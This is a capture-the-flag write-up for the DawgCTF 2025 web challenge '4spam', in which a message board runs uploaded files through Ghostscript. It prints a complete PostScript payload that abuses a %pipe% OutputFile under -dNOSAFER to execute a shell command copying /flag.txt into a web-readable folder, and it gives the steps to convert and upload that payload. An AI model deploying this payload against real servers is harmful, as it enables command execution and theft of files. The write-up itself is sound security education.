DawgCTF 2025 - 4spam

Published: April 22, 2025 | CTF: DawgCTF 2025
CTF Web Ghostscript

4spam (WEB)

Category Web
Points 200
Difficulty Hard
4spam Challenge Description

This challenge involves exploiting a vulnerability in Ghostscript, a popular interpreter for PostScript and PDF files. The challenge website apparently allows users to upload images along with messages to a message board.

4spam Challenge Interface

Identifying the Vulnerability

After exploring the application, I noticed that when uploading files, the server was using Ghostscript to process them, likely to generate thumbnails or validate the uploads. Looking at the error messages, I identified a potential command injection vulnerability:

Ghostscript Error Message

The command is attempting to use Ghostscript (gs) to convert a PostScript file to PDF, but there's an error that reveals what appears to be an attempted command injection exploit. The key suspicious part is in the OutputFile parameter, which contains a pipe command that tries to:

  1. Read /flag.txt
  2. Redirect its contents to /var/www/html/uploads/flag.txt

This suggests a PostScript/Ghostscript vulnerability that allows command execution. The error message reveals the attempted exploit by showing the command in the operand stack.

Vulnerability Details:
- Using GPL Ghostscript version 10.05.0 (dated 2025-03-12)
- The exploit attempts to read a flag file and write it to a web-accessible location
- The command injection is happening through the -sOutputFile parameter
- This looks like a classic PostScript/Ghostscript sandbox escape exploit

Crafting the Exploit

Based on the vulnerability, I crafted a PostScript file that would exploit the -dNOSAFER flag to execute a shell command:

PostScript Exploit Code 
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
mark /OutputFile (%pipe%cat /flag.txt > /var/www/html/uploads/flag.txt) currentdevice putdeviceprops
showpage

This PostScript code exploits the -dNOSAFER flag to execute the shell command cat /flag.txt > /var/www/html/uploads/flag.txt, which will copy the flag to a file in the uploads directory.

Converting to PDF and Uploading

Converting PostScript to PDF

Next, I converted this PostScript file to PDF using Ghostscript itself: 

gs -sDEVICE=pdfwrite -o exploit.pdf exploit.ps

Uploading the Exploit and Accessing the Flag

  1. I went to the 4spam webpage
  2. Typed some text in the "Message" field (it's required)
  3. Chose my exploit.pdf file using the "Image (optional, max 5 MB)" field
  4. Clicked the "Post" button to submit
Uploading the Exploit PDF

After the upload was processed, the server executed my embedded command when it tried to process the PDF with Ghostscript. This created a file named flag.txt in the uploads directory.

Successfully Created File

Finally, I navigated to the uploaded flag file at http://4spam.umbccd.net/uploads/flag.txt:

Flag File Contents
FLAG: DawgCTF{h4ck3d_by_0pay_expl01t}
Key Learning: This challenge demonstrates the dangers of processing user-supplied files with powerful tools like Ghostscript without proper sandboxing. The -dNOSAFER flag in particular allows for command execution, making it a critical vulnerability if exposed to user input.
← Previous: Guess Me If You Can Next: Spectral Secrets →